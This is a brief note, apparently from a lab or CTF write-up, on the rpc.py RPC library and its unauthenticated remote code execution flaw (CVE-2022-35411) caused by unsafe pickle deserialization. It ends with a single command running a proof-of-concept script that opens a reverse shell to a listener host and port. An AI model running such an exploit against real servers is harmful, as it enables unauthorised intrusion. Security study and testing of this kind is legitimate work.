rpc.py

rpc.py is a lightweight Python library designed to facilitate remote procedure calls (RPC) over a network. It enables developers to expose Python functions or methods on a server and invoke them remotely from a client, simplifying distributed application communication. The library serializes data using Python's pickle module, which allows complex objects to be sent back and forth.

The rpc.py versions from 0.4.2 to 0.6.0 are susceptible to an unauthenticated remote code execution (RCE) vulnerability (CVE-2022-35411). This arises from unsafe deserialization of untrusted data using Python’s pickle module. Because rpc.py accepts serialized objects from clients without proper validation or authentication, an attacker can craft a malicious payload that, when deserialized by the server, executes arbitrary system commands.

A python-based PoC is available for getting a reverse shell right away:

python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001